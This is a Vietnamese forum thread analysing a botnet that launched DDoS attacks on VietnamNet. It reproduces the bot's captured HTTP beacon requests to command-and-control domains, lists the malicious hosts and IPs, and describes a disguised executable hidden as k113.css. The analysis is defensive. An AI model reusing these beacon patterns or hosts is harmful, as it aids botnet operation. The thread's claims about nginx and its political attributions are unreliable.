GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: easy.lixns.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: direct.fqin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: find.laxt.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: second.xzin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache
Các bạn để ý: User-Agent đặc biệt của nó và chuổi đằng sau id=. Đây là chuổi Base64 Encode, chứa thông tin lây nhiễm trên máy victim.]]>
/hvaonline/posts/list/39641.html#246192 /hvaonline/posts/list/39641.html#246192 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. VỀ VIỆC XÁC ĐỊNH KỸ LAI MASTER WEBSERVER CỦA STL ĐIỀU KHIỂN CUỘC TẤN CÔNG DDoS VÀO HỆ THỐNG MẠNG CỦA VIETNAMNET 1- Về master webserver này ngoài ý kiến của tôi, đã có một số ý kiến khác, như sau:

PXMMRF 25/08/2011 23:00:12 wrote:
Master webserver có thể là một trong 2 webserver này: www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client). Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.  

mv1098 26/08/2011 00:27:22 wrote:
@anh PXMMRF host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Nó nằm ở Panama City luôn anh à, thủ đô của nó là Panama luôn theo suy luận của em chắc là 200.74.244.198 vì có cái nginx quen thuộc 

TQN 26/08/2011 01:51:49 wrote:
Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về. Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ. RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được. ………………………………………………………………. PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi: Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net
Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này -:|-  
2- Ở đây chúng ta cần phân biệt hai nhóm website-webserver - Nhóm thứ nhất gồm 4 website: http://wide.ircop.cn http://pref.firebay.cn http://daily.leteaks.com http://link.susaks.com - Nhóm thứ hai chỉ có một website -webserver là: http://option.drfound.net Website của nhóm website-webserver thứ hai chứa một file (tại webroot) có tên là k113.css (dung lương 1.030KB). File này, như anh TQN đã RCE (với PEid 0.95- dùng một plugin phù hợp), chứa 2 file là iTunesHelper.exe và iTunesHelper-tray.exe. iTunesHelper.exe này chính là 1 DDoS tool của STL (đã qua thử nghiệm thưc tế trên server thử nghiệm của tôi) Websites của nhóm website-webserver thứ nhất mới là các master website-webserver điều khiển các cuộc tấn công DDoS vào mục tiêu. Trên các website này chứa các file .txt được mã hoá, hướng dẫn DDoS tool thay đổi mục tiêu tấn công (tên miền, đia chỉ IP, đia chỉ URL...).... Cần lưu ý là trong quá trình iTunesHelper.exe tấn công DDoS vao VIETNAMNET nó thường xuyên kết nôi với master website-webserver này. 3- Có gì khác nhau giữa hai đia chỉ: host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (do tôi xác định) và: Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net
do anh TQN xác định? Không có gì khác nhau cả. host-200-74-244-198.ccipanama.com là hostname (computer name) của webserver. Webserver này có IP tĩnh là 200.74.244.198. Tất cả 4 website http://wide.ircop.cn, http://pref.firebay.cn, http://daily.leteaks.com, http://link.susaks.com đều đang hosting (đặt) trên webserver này. Khi khởi phát trong hệ thống thì iTunesHelper.exe luôn kết nối đầu tiên với webserver nói trên. 4- Như đã phân tích webserver này đặt tại PANAMA (Trung Mỹ) Webserver chỉ cài một trình quản lý WEB là NGINX và bình thường các website trên nó chỉ có một file duy nhất là index.html với dòng chữ "ls-lia!" (không hiểu cấp trên của STL viết gì). Khi cần thiết các website trên webserver cùng upload các file .txt (đươc mã hoá) có nội dung giống nhau để update thông tin cho các DDoS tool, nằm trong các zombies trên mạng. Chắc chắn là webserver này đươc thiết lập chỉ nhằm mục đích điều khiển các cuộc tấn công DDoS, có thể trên phạm vi toàn cầu, không hẳn chỉ nhằm vào VIETNAMNET. Nhưng trong thời gian này nó "ưu tiên" cho mục tiêu VIETNAMNET. Mục tiêu tấn công là phải phục vụ cho "đường lối, mục tiêu chính trị' mà cấp trên chỉ đạo. Hì hì. Có người thắc mắc là sao một website với domain có hậu tố là .cn (China) lai được phép đặt ở nước ngoài. Câu trả lời là: Không rõ TQ có luật không cho phép các website của các cơ quan nhà nước đặt trên các webserver đặt tai nước ngoài, như ở VN, hay không?. Giả dụ nếu có, thì các lãnh đạo của STL sẽ tuyên bố: wide.ircop.cn, pref.firebay.cnchỉ là của tư nhân. Vả lai đã là việc của nhà nước, thì làm gì chả được, kể cả việc đó có vi phạm luật lệ hiện hành. 5- Như ta đã biết, các cấp trên của STL đang cho mang bot tấn công vào VIETNAMNET theo 2 hướng: - Tấn công vào mọi website (với các domain khác nhau) của VIETNAMNET - Tấn công vào kết cấu hạ tầng mạng của VIETNAMNET Thí dụ: - iTunesHelper.exe tấn công vào cả vietnamweek.net (Tuần Việt nam) . Đây là một webserver của vietnamnet đặt tai Mỹ có IP là 209.160.52.52. Action:Monitored Application:iTunesHelper.exe Access:Outbound TCP access Object:1580 -> 209.160.52.52:80 (http)----> vietnamweek.net Interface:[1] Compaq NC3131 Fast Ethernet NIC Time:8/30/2011 7:12:31 AM - iTunesHelper.exe cũng tấn công vào địa chỉ: 15.14.91.183-ftth.cmcti.vn (IP là 183.91.14.15, trong IP network 183.91.14.0/23) là route thuộc kết cấu hạ tầng cung cấp kết nối Internet cho tuanvietnam.net. 6- Những sự việc liên quan đến việc tấn công DDoS vao VIETNAMNET vừa qua, mà HVA đã phân tích, chứng tỏ đã có sự tham gia (can dự) của nhóm thành viên lãnh đạo của STL và họ là người TQ. Những công việc phức tạp đòi hỏi một nền tảng kỹ thuật mạng khá cao, như việc điều khiển, thiết lập, định kỳ ngừng hay đưa vào sử dụng các dedicated master-webserver đặt ở nhiều nơi trên TG (có cả PANAMA)... thì phải do các cấp lãnh đạo STL mới có khả năng và quyền hạn làm được. Mấy cậu STL tai VN chắc không thể có khả năng và/hoặc quyền hạn để làm. Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Ngay sau khi kích hoạt, iTunesHelper.exe kết nối đầu tiên với master-webserver
Vị trí địa lý, IP và hostname của master webserver
Vị trí địa lý, IP và hostname của option.drfound.net
Cuộc tấn công DDoS mới nhất (sáng nay) vào vietnamnet ]]>
/hvaonline/posts/list/39641.html#246194 /hvaonline/posts/list/39641.html#246194 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246195 /hvaonline/posts/list/39641.html#246195 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?  
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.]]>
/hvaonline/posts/list/39641.html#246198 /hvaonline/posts/list/39641.html#246198 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

chieutuongtu wrote:
Em theo dõi topic thấy anh TQN có viết, đại ý: k vào được blogspot của gg = máy bị nhiễm STL's "mèo què". Lúc em vào blogspot thì nó ra thông báo này.
Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu? PS: e đang ở trường. 
Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/]]>
/hvaonline/posts/list/39641.html#246217 /hvaonline/posts/list/39641.html#246217 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:

PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?  
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích. 
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang. ]]>
/hvaonline/posts/list/39641.html#246218 /hvaonline/posts/list/39641.html#246218 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246219 /hvaonline/posts/list/39641.html#246219 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Mr Ghost wrote:
@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. :D  
Không phải thế đâu! Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.]]>
/hvaonline/posts/list/39641.html#246221 /hvaonline/posts/list/39641.html#246221 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra. 
Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server]]>
/hvaonline/posts/list/39641.html#246223 /hvaonline/posts/list/39641.html#246223 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.ccihosting.com/servers.php?tab=linux_offshore_server
]]>
/hvaonline/posts/list/39641.html#246226 /hvaonline/posts/list/39641.html#246226 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

texudo wrote:

PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?  
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích. 
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.  
Chào anh PXMMRF, Trong quá trình điều tra, em chưa hề thấy bất cứ một trao đổi hoặc thông tin liên lạc giữa các thành viên stl dùng tiếng Hoa cả. Tất cả đều liên lạc bằng tiếng Việt và họ dùng tiếng Việt cực kỳ đặc thù của người Việt chớ chẳng phải loại tiếng Việt của người ngoại quốc. Nếu những thành viên stl này là người Hoa nhưng dùng tiếng Việt cỡ như vậy thì họ phải là lực lượng cực kỳ đặc biệt. Em có một số người bạn gốc Hoa, sinh tại Việt Nam, họ nói tiếng Việt như người Việt nhưng không thể dùng văn viết như người Việt. Hơn nữa, từ cuối 2009 đến nay, có quá nhiều thông tin (IP, emails, traces....) về stl có nguồn đi từ Việt Nam. Chính McAfee và Google đã xác định việc này. Chính secureworks cũng đã đặt tên botnet đầu tiên của stl là "vecebot" để ám chỉ nguồn xuất phát là từ Việt Nam. Thêm một thông tin quan trọng nữa, từ lúc stl rùm beng trên mạng, họ liên tục đánh phá các trang web, các blogs lề trái. Cho đến khi vietnamnet, cụ thể là trang tuanvietnam bắt đầu gởi một số bài khá trung dung (nhưng không có lợi cho chính phủ và Đảng) thì họ (vietnamnet) bị tấn công. TQ không việc gì phải "dập" các trang lề trái từ hồi 2009. Nếu xét về mặt kỹ thuật, các botnets của TQ nếu cần ra tay thì không có một site nào của Việt Nam hoặc bất cứ quốc gia nào trên thế giới có thể sống nổi. Họ thừa tiền bạc, thừa kỹ thuật để làm chuyện này nhưng xét tổng thể thì họ chẳng có lý do gì phải dập các trang lề trái, kể cả những blogs lè tè của người Việt. Chính báo chí của TQ đã chính thức đăng những thông tin còn dung hại gấp trăm lần thì không việc gì họ phải làm những động thái bóp miệng những trang blogs của người Việt hết. Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao?]]>
/hvaonline/posts/list/39641.html#246227 /hvaonline/posts/list/39641.html#246227 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:

PXMMRF wrote:
Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network. Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD. IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có. Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra. 
Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server 
Mình cũng thường tham khảo website này, nhưng chỉ để so sánh. Nhưng đó là một website khá tốt. Nói chung về các phương diện kiểm tra trên mang mình cố tìm và dùng những phần mêm Pro, chuyên nghiệp, hạng nhất (có soft giá chính thức đến vài trăm ngàn USD. Mình tìm phiên bản cũ rồi tìm cách update nó lên để tạm dùng). Tất nhiên là không thể mua chúng một cách chính thức. Trường hợp khác, có khi phải mua hàng trăm đĩa CD loại 6K, nay có chỗ tăng lên 8K (vì inflation) mới tìm ra cái soft. mình cần. Hoặc tìm trên mạng và rồi phải sống chung với virus. Trang crack nào cũng có cài mã độc cả ]]>
/hvaonline/posts/list/39641.html#246228 /hvaonline/posts/list/39641.html#246228 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?  
1 mặt thì tấn công website lề trái, 1 mặt thì tấn công lề phải (Vietnamnet). Vậy mục đích của họ là gì? Vì bọn TQ có liên quan gì đến việc "ổn định chính trị" của Việt Nam cả. Nếu là TQ đánh vào cơ sở hạ tầng VN. Tại sao cơ quan nhà nước ta ko dám lên tiếng? ]]>
/hvaonline/posts/list/39641.html#246229 /hvaonline/posts/list/39641.html#246229 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

PXMMRF wrote:

texudo wrote:

PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?  
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích. 
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác. Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.  
Chào anh PXMMRF, .................................................................................................................... Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao? 
Đó cũng là những câu hỏi mà tôi luôn trăn trở. Nay tình hình đã sáng ra, thông qua các phân tích của HVA vừa qua. "Trung tâm an ninh mạng" chỉ là một đơn vị hoạt đông theo kiểu hành chính. Biên chế của họ ít, nên không thể làm được các việc quan trọng, đòi hỏi nhiều công sức. Họ làm được gì các năm qua, thì ta đã thấy. Còn các bác ở vietnamnet có vẻ đang lúng túng. Chuyển từ báo in sang báo mạng, họ găp nhiều khó khăn và có thể vẫn làm việc theo cơ chế cũ kỹ. Ban Tổng biên tập của họ dường như không co các chuyên gia tầm cỡ về IT để có thể chỉ đạo và đưa ra các chính sách kỹ thuật, bảo mật hơp lý. Vietnamnet tăng trưởng quá nhanh, nhưng lại không cân đối với trình độ và năng lưc quản lý mạng, IT, vốn còn lạc hậu, không theo kip. Họ quản lý rất nhiều IP tĩnh nhưng việc bố trí các website và sử dụng khối IP đó một cách hợp lý thì lại đang có vấn đề. Khi bị tấn công DDoS, thay vì họ phải bố trí lại kết cấu hạ tầng mạng một cách hợp lý hơn, thì họ lai đưa các web server NGINX vào để thay thế Apache, hay làm một chốt chặn đầu vào, trong khi NGINX có một lỗi chết người là lỗi buffer overflow liên quan đến khả năng lọc input data của nó khá kém và hay có lỗi. Một số chuyên gia quốc tế nói là NGINX thường chỉ được các tổ chức tội phạm ưa dùng vì có thể "đánh nhanh rút nhanh". Với khả năng tài chính dồi dào, vietnamnet hoàn toàn có thể nhờ AkamaiTechnologies hỗ trợ và quản lý hệ thống để loại trừ tác hai của DDoS, như nhiều công ty lớn hay rất lớn của Mỹ đã nhờ, nhưng họ lại chưa làm. Không rõ tai sao... vân vân. Cũng có một điều là các công ty, xí nghiệp, tổ chức của VN thường có bệnh thành tích. Và vì vậy họ thường giấu kín các khuyết điểm, không muốn nói ra các khó khăn. Sơ bị trên đánh giá là thiếu năng lưc hoan thành nhiệm vụ.... Mà có nhờ ai, thì họ phải tìm những cơ quan lớn, cơ quan cấp trên (như Bộ Khoa học công nghệ chẳng hạn). Ai lai nhờ HVA, sợ mang tiếng. Thế đấy. Hi hì. Tôi cũng nghĩ là các thành viên STL là người VN 100%, như chính chúng ta. Chỉ có tổ chức lãnh đạo, trả lương và điều khiển, hướng dẫn KT cho họ là các bác TQ thôi. ]]>
/hvaonline/posts/list/39641.html#246231 /hvaonline/posts/list/39641.html#246231 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246232 /hvaonline/posts/list/39641.html#246232 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Đó cũng là những câu hỏi mà tôi luôn trăn trở. Nay tình hình đã sáng ra, thông qua các phân tích của HVA vừa qua. "Trung tâm an ninh mạng" chỉ là một đơn vị hoạt đông theo kiểu hành chính. Biên chế của họ ít, nên không thể làm được các việc quan trọng, đòi hỏi nhiều công sức. Họ làm được gì, thì ta đã thấy.  
Hè hè, còn HVA của mình thì sao anh? HVA mình chỉ có "biên chế" tiền túi và thời gian cá nhân bỏ ra mà thôi :P . Biên chế của mấy anh em HVA còn eo hẹp thua "trung tâm an ninh mạng" cả trăm lần nhưng cho đến nay, HVA đã làm những gì? Điều này anh em nào công tâm nhìn vô cũng thấy. Em không có ý trách "trung tâm an ninh mạng" và cũng chẳng có ý so sánh. Em chỉ muốn nói rằng, nếu muốn làm thì đã làm được và làm xong rồi.

PXMMRF wrote:
Còn các bác ở vietnamnet có vẻ đang lúng túng. Chuyển từ báo in sang báo mạng, họ găp nhiều khó khăn và có thể vẫn làm việc theo cơ chế cũ kỹ. Ban Tổng biên tập của họ dường như không co các chuyên gia tầm cỡ về IT để có thể chỉ đạo và đưa ra các chính sách kỹ thuật, bảo mật hơp lý. Vietnamnet tăng trưởng quá nhanh, nhưng lại không cân đối với trình độ và năng lưc quản lý mạng, IT, vốn còn lạc hậu, không theo kip. Họ quản lý rất nhiều IP tĩnh nhưng việc bố trí các website và sử dụng khối IP đó một cách hợp lý thì lại đang có vấn đề. Khi bị tấn công DDoS, thay vì họ phải bố trí lại kết cấu hạ tầng mạng một cách hợp lý hơn, thì họ lai đưa các web server NGINX vào để thay thế Apache, hay làm một chốt chặn đầu vào, trong khi NGINX có một lỗi chết người là lỗi buffer overflow liên quan đến khả năng lọc input data của nó khá kém và hay có lỗi. Một số chuyên gia quốc tế nói là NGINX thường chỉ được các tổ chức tội phạm ưa dùng vì có thể "đánh nhanh rút nhanh". Với khả năng tài chính dồi dào, vietnamnet hoàn toàn có thể nhờ AkamaiTechnologies hỗ trợ và quản lý hệ thống để loại trừ tác hai của DDoS, như nhiều công ty lớn hay rất lớn của Mỹ đã nhờ, nhưng họ lại chưa làm. Không rõ tai sao... vân vân.  
